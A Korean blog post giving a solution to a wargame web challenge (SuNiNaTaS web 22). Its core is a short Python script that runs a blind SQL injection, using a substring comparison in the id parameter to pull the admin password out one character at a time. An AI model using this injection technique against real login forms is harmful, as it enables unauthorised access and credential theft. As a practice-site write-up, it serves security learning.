Notice
Recent Posts
Recent Comments
Link
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | |||||
3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 |
Tags
- JSTL
- 인턴 지원
- 인턴 후기
- Layered Architecture
- riceteacatpanda
- SessionAttribute
- webhacking 처음
- 동읍면 DB
- Database
- 방명록 만들기
- 메모리 포랜식
- reversing.kr
- frontend
- jsp
- 3단계 지역 DB
- 네이버 인턴
- react
- 소프트웨어 개발보안 경진대회
- spring
- 행정지역 DB
- EER
- Django
- Forensic 절차
- 정보보호병 후기
- ㅁㅇㅂ??ㅇㅈㄷ ㅎㅇㅌ...
- DBMS
- mysql
- restapi
- 소개딩
- PyAmdecoder
Archives
- Today
- Total
웹찢남
SuNiNaTaS [WEB 22번] 풀이 본문
대놓고 blind sql injection 문제다.. 여러 값을 넣어보면 pw를 나중에 한번 더 확인 하는 걸 알 수있다.
import re
import requests
import time
flag = ''
length= 0
for i in range (1,20):
for j in range(33,122):
r=requests.post("http://www.suninatas.com/challenge/web22/web22.asp?id=admin' and substring(pw,"+str(i)+",1)='"+chr(j)+"'-- &pw=123")
if 'OK admin' in r.text:
flag=flag+chr(j)
print("finding pw: "+flag)
break
print("pw "+flag)
위와 같이 코드를 작성하면 아래와 같은 값이 나온다.
CLEAR!!!
'WEB_HACKING > Suninatas' 카테고리의 다른 글
SuNiNaTaS [WEB 23번] 풀이 (0) | 2020.02.18 |
---|---|
SuNiNaTaS [WEB 8번] 풀이 (0) | 2020.02.18 |
SuNiNaTaS [WEB 7번] 풀이 (0) | 2020.02.18 |
SuNiNaTaS [WEB 6번] 풀이 (0) | 2020.02.18 |
SuNiNaTaS [WEB 5번] 풀이 (0) | 2020.02.18 |
Comments